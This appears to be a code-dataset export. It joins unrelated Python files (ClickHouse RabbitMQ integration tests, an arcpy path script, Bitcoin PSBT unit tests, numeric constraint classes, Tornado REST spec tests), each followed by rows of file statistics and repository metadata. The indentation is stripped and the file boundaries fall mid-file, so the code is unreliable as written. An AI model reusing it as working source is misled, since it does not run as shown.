CREATE TABLE test.topic_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 5,
rabbitmq_exchange_name = 'topic_exchange_testing',
rabbitmq_exchange_type = 'topic',
rabbitmq_routing_key_list = '*.{0}',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.topic_exchange_{0}_mv TO test.destination AS
SELECT key, value, '{0}' as _consumed_by FROM test.topic_exchange_{0};
'''.format(consumer_id))
for consumer_id in range(num_tables):
print("Setting up table {}".format(num_tables + consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.topic_exchange_{0};
DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
CREATE TABLE test.topic_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 4,
rabbitmq_exchange_name = 'topic_exchange_testing',
rabbitmq_exchange_type = 'topic',
rabbitmq_routing_key_list = '*.logs',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.topic_exchange_{0}_mv TO test.destination AS
SELECT key, value, '{0}' as _consumed_by FROM test.topic_exchange_{0};
'''.format(num_tables + consumer_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='topic_exchange_testing', exchange_type='topic')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key_num = 0
for num in range(num_tables):
key = "topic." + str(key_num)
key_num += 1
for message in messages:
channel.basic_publish(exchange='topic_exchange_testing', routing_key=key, body=message)
key = "random.logs"
for message in messages:
mes_id = str(randrange(10))
channel.basic_publish(
exchange='topic_exchange_testing', routing_key=key,
properties=pika.BasicProperties(message_id=mes_id), body=message)
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables + messages_num * num_tables:
break
for consumer_id in range(num_tables * 2):
instance.query('''
DROP TABLE IF EXISTS test.topic_exchange_{0};
DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
'''.format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
assert int(result) == messages_num * num_tables + messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_hash_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64,
_consumed_by LowCardinality(String))
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 4
for consumer_id in range(num_tables):
table_name = 'rabbitmq_consumer{}'.format(consumer_id)
print("Setting up {}".format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 10,
rabbitmq_exchange_type = 'consistent_hash',
rabbitmq_exchange_name = 'hash_exchange_testing',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT key, value, '{0}' as _consumed_by FROM test.{0};
'''.format(table_name))
i = [0]
messages_num = 500
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
def produce():
# init connection here because otherwise python rabbitmq client might fail
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='hash_exchange_testing', exchange_type='x-consistent-hash')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for message in messages:
key = str(randrange(10))
channel.basic_publish(exchange='hash_exchange_testing', routing_key=key, body=message)
connection.close()
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
for consumer_id in range(num_tables):
table_name = 'rabbitmq_consumer{}'.format(consumer_id)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_multiple_bindings(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64,
_consumed_by LowCardinality(String))
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
DROP TABLE IF EXISTS test.bindings_1;
DROP TABLE IF EXISTS test.bindings_1_mv;
CREATE TABLE test.bindings_1 (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 5,
rabbitmq_num_queues = 2,
rabbitmq_exchange_name = 'multiple_bindings_testing',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'key1,key2,key3,key4,key5',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.bindings_1_mv TO test.destination AS
SELECT * FROM test.bindings_1;
''')
# in case num_consumers and num_queues are not set - multiple bindings are implemented differently, so test them too
instance.query('''
DROP TABLE IF EXISTS test.bindings_2;
DROP TABLE IF EXISTS test.bindings_2_mv;
CREATE TABLE test.bindings_2 (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'multiple_bindings_testing',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'key1,key2,key3,key4,key5',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.bindings_2_mv TO test.destination AS
SELECT * FROM test.bindings_2;
''')
i = [0]
messages_num = 500
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
def produce():
# init connection here because otherwise python rabbitmq client might fail
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='multiple_bindings_testing', exchange_type='direct')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
keys = ['key1', 'key2', 'key3', 'key4', 'key5']
for key in keys:
for message in messages:
mes_id = str(randrange(10))
channel.basic_publish(exchange='multiple_bindings_testing', routing_key=key,
properties=pika.BasicProperties(message_id=mes_id), body=message)
connection.close()
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * threads_num * 5 * 2:
break
for thread in threads:
thread.join()
instance.query('''
DROP TABLE IF EXISTS test.bindings_1;
DROP TABLE IF EXISTS test.bindings_2;
DROP TABLE IF EXISTS test.destination;
''')
assert int(result) == messages_num * threads_num * 5 * 2, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_headers_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64,
_consumed_by LowCardinality(String))
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables_to_receive = 3
for consumer_id in range(num_tables_to_receive):
print("Setting up table {}".format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.headers_exchange_{0};
DROP TABLE IF EXISTS test.headers_exchange_{0}_mv;
CREATE TABLE test.headers_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 4,
rabbitmq_exchange_name = 'headers_exchange_testing',
rabbitmq_exchange_type = 'headers',
rabbitmq_routing_key_list = 'x-match=all,format=logs,type=report,year=2020',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.headers_exchange_{0}_mv TO test.destination AS
SELECT key, value, '{0}' as _consumed_by FROM test.headers_exchange_{0};
'''.format(consumer_id))
num_tables_to_ignore = 2
for consumer_id in range(num_tables_to_ignore):
print("Setting up table {}".format(consumer_id + num_tables_to_receive))
instance.query('''
DROP TABLE IF EXISTS test.headers_exchange_{0};
DROP TABLE IF EXISTS test.headers_exchange_{0}_mv;
CREATE TABLE test.headers_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'headers_exchange_testing',
rabbitmq_exchange_type = 'headers',
rabbitmq_routing_key_list = 'x-match=all,format=logs,type=report,year=2019',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.headers_exchange_{0}_mv TO test.destination AS
SELECT key, value, '{0}' as _consumed_by FROM test.headers_exchange_{0};
'''.format(consumer_id + num_tables_to_receive))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='headers_exchange_testing', exchange_type='headers')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
fields={}
fields['format']='logs'
fields['type']='report'
fields['year']='2020'
key_num = 0
for message in messages:
mes_id = str(randrange(10))
channel.basic_publish(exchange='headers_exchange_testing', routing_key='',
properties=pika.BasicProperties(headers=fields, message_id=mes_id), body=message)
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables_to_receive:
break
for consumer_id in range(num_tables_to_receive + num_tables_to_ignore):
instance.query('''
DROP TABLE IF EXISTS test.direct_exchange_{0};
DROP TABLE IF EXISTS test.direct_exchange_{0}_mv;
'''.format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
assert int(result) == messages_num * num_tables_to_receive, 'ClickHouse lost some messages: {}'.format(result)
if __name__ == '__main__':
cluster.start()
raw_input("Cluster created, press any key to destroy...")
cluster.shutdown()
| 35.887296
| 131
| 0.619838
| 6,058
| 55,087
| 5.450149
| 0.051502
| 0.023988
| 0.025987
| 0.040161
| 0.880183
| 0.862556
| 0.854105
| 0.836236
| 0.808038
| 0.798043
| 0
| 0.022148
| 0.277906
| 55,087
| 1,534
| 132
| 35.910691
| 0.807884
| 0.006045
| 0
| 0.790438
| 0
| 0.00239
| 0.449447
| 0.082674
| 0
| 0
| 0
| 0
| 0.012749
| 1
| 0.032669
| false
| 0
| 0.011952
| 0
| 0.047012
| 0.011952
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51aabc090e10a4cf306592fc043ca0ca1d10e9c1
| 599
|
py
|
Python
|
MergeCensusPolygonsMOIL.py
|
MetroSTL/TitleVI-Analysis
|
33a22b9574aa9d383e84c198dd2c8090a6f8ed5f
|
[
"MIT"
] | 1
|
2019-10-28T03:06:44.000Z
|
2019-10-28T03:06:44.000Z
|
MergeCensusPolygonsMOIL.py
|
MetroSTL/TitleVI-Analysis
|
33a22b9574aa9d383e84c198dd2c8090a6f8ed5f
|
[
"MIT"
] | 5
|
2019-10-28T15:28:33.000Z
|
2019-10-28T15:33:10.000Z
|
MergeCensusPolygonsMOIL.py
|
AvidDabbler/TitleVI-Analysis
|
bc447ead902c4c6bf4fbfbb92f4dfbb75f22b5a6
|
[
"MIT"
] | 1
|
2021-03-17T13:50:24.000Z
|
2021-03-17T13:50:24.000Z
|
import arcpy as ap
import os
env = ap.env.workspace = os.path("W:\Research&Development\Data-Share\layers\Missouri_ACS_5yr_GDB")
final_name = "ACS_2013_5YR_BG"
il_path = os.path.join("W:\Research&Development\Data-Share\layers\Missouri_ACS_5yr_GDB\ACS_2013_5YR_BG_17.gdb\ACS_2013_5YR_BG_17_ILLINOIS.gdb", "ACS_2013_5YR_BG_17_ILLINOIS")
mo_path = os.path.join("W:\Research&Development\Data-Share\layers\Missouri_ACS_5yr_GDB\ACS_2013_5YR_BG_29.gdb\ACS_2013_5YR_BG_29_MISSOURI.gdb", "ACS_2013_5YR_BG_29_MISSOURI")
outputgdb = "W:\Research&Development\Data-Share\layers\Missouri_ACS_5yr_GDB\merge.gdb"
| 54.454545
| 174
| 0.831386
| 109
| 599
| 4.146789
| 0.275229
| 0.108407
| 0.154867
| 0.185841
| 0.80531
| 0.80531
| 0.79646
| 0.575221
| 0.575221
| 0.575221
| 0
| 0.089317
| 0.046745
| 599
| 10
| 175
| 59.9
| 0.702277
| 0
| 0
| 0
| 0
| 0.285714
| 0.729549
| 0.704508
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.285714
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51ee4480f3685f7b55860f93c5fe4a2b23719ad9
| 3,304
|
py
|
Python
|
tests/test_bitcoin.py
|
yvmeis/UZHBitcoin-HardwareWallet
|
021bc86cd66b5af89c108db0ccdedcfe22543d96
|
[
"MIT"
] | null | null | null |
tests/test_bitcoin.py
|
yvmeis/UZHBitcoin-HardwareWallet
|
021bc86cd66b5af89c108db0ccdedcfe22543d96
|
[
"MIT"
] | null | null | null |
tests/test_bitcoin.py
|
yvmeis/UZHBitcoin-HardwareWallet
|
021bc86cd66b5af89c108db0ccdedcfe22543d96
|
[
"MIT"
] | null | null | null |
import unittest
from src.coins.bitcoin import Bitcoin
class TestBitcoin(unittest.TestCase):
def setUp(self):
self.psbt_signed = b"cHNidP8BAJoCAAAAAljoeiG1ba8MI76OcHBFbDNvfLqlyHV5JPVFiHuyq911AAAAAAD/////g40EJ9DsZQpoqka7CwmK6kQiwHGyyng1Kgd5WdB86h0BAAAAAP////8CcKrwCAAAAAAWABTYXCtx0AYLCcmIauuBXlCZHdoSTQDh9QUAAAAAFgAUAK6pouXw+HaliN9VRuh0LR2HAI8AAAAAAAEAuwIAAAABqtc5MQGL0l+ErkALaISL4J23BurCrBgpi6vucatlb4sAAAAASEcwRAIgWPb8fGoz4bMVSNSByCbAFb0wE1qtQs1neQ2rZtKtJDsCIEoc7SYExnNbY5PltBaR3XiwDwxZQvufdRhW+qk4FX26Af7///8CgPD6AgAAAAAXqRQPuUY0IWlrgsgzryQceMF9295JNIfQ8gonAQAAABepFCnKdPigj4GZlCgYXJe12FLkBj9hh2UAAAAiAgKVg785rgpgl0etGZrd1jT6YQhVnWxc05tMIYPxq5bgf0cwRAIgdAGK1BgAl7hzMjwAFXILNoTMgSOJEEjn282bVa1nnJkCIHPTabdA4+tT3O+jOCPIBwUUylWn3ZVE8VfBZ5EyYRGMAQEDBAEAAAABBEdSIQKVg785rgpgl0etGZrd1jT6YQhVnWxc05tMIYPxq5bgfyEC2rYf9JoU22p9ArDNH7t4/EsYMStbTlTa5Nui+/71NtdSriIGApWDvzmuCmCXR60Zmt3WNPphCFWdbFzTm0whg/GrluB/ENkMak8AAACAAAAAgAAAAIAiBgLath/0mhTban0CsM0fu3j8SxgxK1tOVNrk26L7/vU21xDZDGpPAAAAgAAAAIABAACAAAEBIADC6wsAAAAAF6kUt/X69A49QKWkWbHbNTXyty+pIeiHIgIDCJ3BDHrG21T5EymvYXMz2ziM6tDCMfcjN50bmQMLAtxHMEQCIGLrelVhB6fHP0WsSrWh3d9vcHX7EnWWmn84Pv/3hLyyAiAMBdu3Rw2/LwhVfdNWxzJcHtMJE+mWzThAlF2xIijaXwEBAwQBAAAAAQQiACCMI1MXN0O1ld+0oHtyuo5C43l9p06H/n2ddJfjsgKJAwEFR1IhAwidwQx6xttU+RMpr2FzM9s4jOrQwjH3IzedG5kDCwLcIQI63ZBPPW3PWd25BrDe4jUpt/+57VDl6GFRkmhgIh8Oc1KuIgYCOt2QTz1tz1nduQaw3uI1Kbf/ue1Q5ehhUZJoYCIfDnMQ2QxqTwAAAIAAAACAAwAAgCIGAwidwQx6xttU+RMpr2FzM9s4jOrQwjH3IzedG5kDCwLcENkMak8AAACAAAAAgAIAAIAAIgIDqaTDf1mW06ol26xrVwrwZQOUSSlCRgs1R1Ptnuylh3EQ2QxqTwAAAIAAAACABAAAgAAiAgJ/Y5l1fS7/VaE2rQLGhLGDi2VW5fG2s0KCqUtrUAUQlhDZDGpPAAAAgAAAAIAFAACAAA=="
self.psbt_unsigned = b"cHNidP8BAJoCAAAAAljoeiG1ba8MI76OcHBFbDNvfLqlyHV5JPVFiHuyq911AAAAAAD/////g40EJ9DsZQpoqka7CwmK6kQiwHGyyng1Kgd5WdB86h0BAAAAAP////8CcKrwCAAAAAAWABTYXCtx0AYLCcmIauuBXlCZHdoSTQDh9QUAAAAAFgAUAK6pouXw+HaliN9VRuh0LR2HAI8AAAAAAAEAuwIAAAABqtc5MQGL0l+ErkALaISL4J23BurCrBgpi6vucatlb4sAAAAASEcwRAIgWPb8fGoz4bMVSNSByCbAFb0wE1qtQs1neQ2rZtKtJDsCIEoc7SYExnNbY5PltBaR3XiwDwxZQvufdRhW+qk4FX26Af7///8CgPD6AgAAAAAXqRQPuUY0IWlrgsgzryQceMF9295JNIfQ8gonAQAAABepFCnKdPigj4GZlCgYXJe12FLkBj9hh2UAAAABAwQBAAAAAQRHUiEClYO/Oa4KYJdHrRma3dY0+mEIVZ1sXNObTCGD8auW4H8hAtq2H/SaFNtqfQKwzR+7ePxLGDErW05U2uTbovv+9TbXUq4iBgKVg785rgpgl0etGZrd1jT6YQhVnWxc05tMIYPxq5bgfxDZDGpPAAAAgAAAAIAAAACAIgYC2rYf9JoU22p9ArDNH7t4/EsYMStbTlTa5Nui+/71NtcQ2QxqTwAAAIAAAACAAQAAgAABASAAwusLAAAAABepFLf1+vQOPUClpFmx2zU18rcvqSHohwEDBAEAAAABBCIAIIwjUxc3Q7WV37Sge3K6jkLjeX2nTof+fZ10l+OyAokDAQVHUiEDCJ3BDHrG21T5EymvYXMz2ziM6tDCMfcjN50bmQMLAtwhAjrdkE89bc9Z3bkGsN7iNSm3/7ntUOXoYVGSaGAiHw5zUq4iBgI63ZBPPW3PWd25BrDe4jUpt/+57VDl6GFRkmhgIh8OcxDZDGpPAAAAgAAAAIADAACAIgYDCJ3BDHrG21T5EymvYXMz2ziM6tDCMfcjN50bmQMLAtwQ2QxqTwAAAIAAAACAAgAAgAAiAgOppMN/WZbTqiXbrGtXCvBlA5RJKUJGCzVHU+2e7KWHcRDZDGpPAAAAgAAAAIAEAACAACICAn9jmXV9Lv9VoTatAsaEsYOLZVbl8bazQoKpS2tQBRCWENkMak8AAACAAAAAgAUAAIAA"
self.bit = Bitcoin()
def test_sign_transction(self):
pass
def test_display_transaction_amount(self):
text: str = self.bit.get_transaction_info(self.psbt_unsigned)
self.assertIn("1.4999 btc", text)
def test_display_transaction_addr(self):
text: str = self.bit.get_transaction_info(self.psbt_unsigned)
self.assertIn("bc1qmpwzkuwsqc9snjvgdt4czhjsnywa5yjdgwyw6k", text)
| 157.333333
| 1,522
| 0.923729
| 123
| 3,304
| 24.682927
| 0.617886
| 0.01054
| 0.01581
| 0.121212
| 0.28195
| 0.28195
| 0.28195
| 0.042161
| 0.042161
| 0.042161
| 0
| 0.114465
| 0.03753
| 3,304
| 20
| 1,523
| 165.2
| 0.840252
| 0
| 0
| 0.133333
| 0
| 0.133333
| 0.831719
| 0.828692
| 0
| 1
| 0
| 0
| 0.133333
| 1
| 0.266667
| false
| 0.066667
| 0.133333
| 0
| 0.466667
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
51f46755b03e054fb6b2b49004c54f04bdb86738
| 2,885
|
py
|
Python
|
marmot/_core.py
|
JakeNunemaker/marmot
|
0d65aabf1c77b9de00e7eff257af2df6ed3065c6
|
[
"BSD-3-Clause"
] | 2
|
2020-11-12T16:33:08.000Z
|
2020-11-13T21:21:36.000Z
|
marmot/_core.py
|
JakeNunemaker/marmot
|
0d65aabf1c77b9de00e7eff257af2df6ed3065c6
|
[
"BSD-3-Clause"
] | 2
|
2020-12-07T20:27:53.000Z
|
2020-12-07T20:28:44.000Z
|
marmot/_core.py
|
JakeNunemaker/marmot
|
0d65aabf1c77b9de00e7eff257af2df6ed3065c6
|
[
"BSD-3-Clause"
] | null | null | null |
"""Core functionality for marmot process modeling."""
__author__ = "Jake Nunemaker"
__copyright__ = "Copyright 2020, Jake Nunemaker"
__email__ = "jake.d.nunemaker@gmail.com"
__status__ = "Development"
class Constraint:
pass
class gt(Constraint):
def __init__(self, val):
if isinstance(val, (int, float)) and not isinstance(val, bool):
self.val = val
else:
raise TypeError(f"Constraint 'gt' requires a numeric input.")
def __call__(self, arr):
"""
Returns boolean array where `arr` > `val`.
Parameters
----------
arr : array-like
"""
return arr > self.val
def __repr__(self):
return f" > {self.val}"
class ge(Constraint):
def __init__(self, val):
if isinstance(val, (int, float)) and not isinstance(val, bool):
self.val = val
else:
raise TypeError(f"Constraint 'ge' requires a numeric input.")
def __call__(self, arr):
"""
Returns boolean array where `arr` >= `val`.
Parameters
----------
arr : array-like
"""
return arr >= self.val
def __repr__(self):
return f" >= {self.val}"
class lt(Constraint):
def __init__(self, val):
if isinstance(val, (int, float)) and not isinstance(val, bool):
self.val = val
else:
raise TypeError(f"Constraint 'lt' requires a numeric input.")
def __call__(self, arr):
"""
Returns boolean array where `arr` < `val`.
Parameters
----------
arr : array-like
"""
return arr < self.val
def __repr__(self):
return f" < {self.val}"
class le(Constraint):
def __init__(self, val):
if isinstance(val, (int, float)) and not isinstance(val, bool):
self.val = val
else:
raise TypeError(f"Constraint 'le' requires a numeric input.")
def __call__(self, arr):
"""
Returns boolean array where `arr` <= `val`.
Parameters
----------
arr : array-like
"""
return arr <= self.val
def __repr__(self):
return f" <= {self.val}"
class false(Constraint):
def __init__(self):
pass
def __call__(self, arr):
"""
Returns boolean array where `array` is `False`.
Parameters
----------
arr : array-like
"""
return ~arr.astype(bool)
def __repr__(self):
return f" is False"
class true(Constraint):
def __init__(self):
pass
def __call__(self, arr):
"""
Returns boolean array where `array` is `True`.
Parameters
----------
arr : array-like
"""
return arr.astype(bool)
def __repr__(self):
return f" is True"
| 19.10596
| 73
| 0.529983
| 311
| 2,885
| 4.633441
| 0.18328
| 0.077724
| 0.070784
| 0.087439
| 0.853574
| 0.853574
| 0.853574
| 0.853574
| 0.853574
| 0.853574
| 0
| 0.002098
| 0.338995
| 2,885
| 150
| 74
| 19.233333
| 0.75354
| 0.192721
| 0
| 0.55
| 0
| 0
| 0.154826
| 0.012739
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0.05
| 0
| 0.1
| 0.616667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
cfb44eca3eb9173dc118cf3f0581646e985d0f6d
| 6,354
|
py
|
Python
|
tests/test_spec.py
|
d21d3q/tornado-restplus
|
828c942271af0fb5db8c39da488e486cda65ba48
|
[
"MIT"
] | 1
|
2019-05-11T09:21:50.000Z
|
2019-05-11T09:21:50.000Z
|
tests/test_spec.py
|
d21d3q/tornado-restplus
|
828c942271af0fb5db8c39da488e486cda65ba48
|
[
"MIT"
] | null | null | null |
tests/test_spec.py
|
d21d3q/tornado-restplus
|
828c942271af0fb5db8c39da488e486cda65ba48
|
[
"MIT"
] | null | null | null |
from tornado.web import Application
from unittest import TestCase
from tornado_restplus import Api
from tests.common import BaseEchoHandler
from marshmallow import Schema, fields
class SpecTest(TestCase):
def setUp(self):
super(SpecTest, self).setUp()
self.app = Application()
self.api = Api(self.app, title='Api title')
self.ns = self.api.namespace('api')
def test_route_spec(self):
@self.ns.route('/path', _doc=True)
class SomeHandler(BaseEchoHandler):
def get():
'''Get a greeting endpoint.
---
description: Get a greeting
responses:
200:
description: A greeting to the client
'''
pass
def post():
pass
@self.ns.route('/another_path', _doc=True)
class AnotherHandler(BaseEchoHandler):
def get():
'''Get a greeting endpoint.
---
description: Get a greeting from another handler
responses:
200:
description: A greeting to the client from another
handler
'''
pass
doc = self.api.spec.to_dict()
assert doc['info']['title'] == 'Api title'
assert '/api/path' in doc['paths']
assert doc['paths']['/api/path']['get']['description'] == \
'Get a greeting'
assert '/api/another_path' in doc['paths']
assert doc['paths']['/api/another_path']['get']['description'] == \
'Get a greeting from another handler'
def test_route_without_spec(self):
@self.ns.route('/path', _doc=False)
class SomeHandler(BaseEchoHandler):
def get():
'''Get a greeting endpoint.
---
description: Get a greeting
responses:
200:
description: A greeting to the client
'''
pass
def post():
pass
doc = self.api.spec.to_dict()
assert doc['info']['title'] == 'Api title'
assert '/api/path' not in doc['paths']
def test_schema_definition_in_registered_namespace(self):
class CategorySchema(Schema):
id = fields.Int()
name = fields.Str(required=True)
class PetSchema(Schema):
category = fields.Nested(CategorySchema, many=True)
name = fields.Str()
@self.ns.route('/path', _doc=True)
class SomeHandler(BaseEchoHandler):
def get(self):
'''Get a greeting endpoint.
---
description: Get a greeting
responses:
200:
description: A greeting to the client
schema: PetSchema
'''
pass
def post(self):
pass
self.ns.definition('Category', schema=CategorySchema)
self.ns.definition('Pet', schema=PetSchema)
doc = self.api.spec.to_dict()
assert len(doc['definitions']) == 2
assert 'Category' in doc['definitions']
assert 'name' in doc['definitions']['Category']['properties']
assert 'id' in doc['definitions']['Category']['properties']
assert 'Pet' in doc['definitions']
assert 'name' in doc['definitions']['Pet']['properties']
assert 'category' in doc['definitions']['Pet']['properties']
def test_schema_definition_in_api(self):
class CategorySchema(Schema):
id = fields.Int()
name = fields.Str(required=True)
class PetSchema(Schema):
category = fields.Nested(CategorySchema, many=True)
name = fields.Str()
@self.ns.route('/path', _doc=True)
class SomeHandler(BaseEchoHandler):
def get():
'''Get a greeting endpoint.
---
description: Get a greeting
responses:
200:
description: A greeting to the client
schema: PetSchema
'''
pass
def post():
pass
self.api.definition('Category', schema=CategorySchema)
self.api.definition('Pet', schema=PetSchema)
doc = self.api.spec.to_dict()
assert len(doc['definitions']) == 2
assert 'Category' in doc['definitions']
assert 'name' in doc['definitions']['Category']['properties']
assert 'id' in doc['definitions']['Category']['properties']
assert 'Pet' in doc['definitions']
assert 'name' in doc['definitions']['Pet']['properties']
assert 'category' in doc['definitions']['Pet']['properties']
def test_schema_definition_lazy_loading(self):
class CategorySchema(Schema):
id = fields.Int()
name = fields.Str(required=True)
class PetSchema(Schema):
category = fields.Nested(CategorySchema, many=True)
name = fields.Str()
@self.ns.route('/path', _doc=True)
class SomeHandler(BaseEchoHandler):
def get():
'''Get a greeting endpoint.
---
description: Get a greeting
responses:
200:
description: A greeting to the client
schema: PetSchema
'''
pass
def post():
pass
ns = self.api.namespace('lazy_api')
ns.definition('Category', schema=CategorySchema)
ns.definition('Pet', schema=PetSchema)
self.api.add_namespace(ns)
doc = self.api.spec.to_dict()
assert len(doc['definitions']) == 2
assert 'Category' in doc['definitions']
assert 'name' in doc['definitions']['Category']['properties']
assert 'id' in doc['definitions']['Category']['properties']
assert 'Pet' in doc['definitions']
assert 'name' in doc['definitions']['Pet']['properties']
assert 'category' in doc['definitions']['Pet']['properties']
| 33.97861
| 75
| 0.519987
| 611
| 6,354
| 5.350246
| 0.12275
| 0.03212
| 0.0881
| 0.056286
| 0.841848
| 0.782808
| 0.77149
| 0.743041
| 0.712144
| 0.712144
| 0
| 0.005202
| 0.364652
| 6,354
| 186
| 76
| 34.16129
| 0.804558
| 0.138181
| 0
| 0.675676
| 0
| 0
| 0.165451
| 0
| 0
| 0
| 0
| 0
| 0.252252
| 1
| 0.153153
| false
| 0.099099
| 0.045045
| 0
| 0.315315
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
cfeb40bf3ffbd541e709c0c323545924d4661130
| 5,245
|
py
|
Python
|
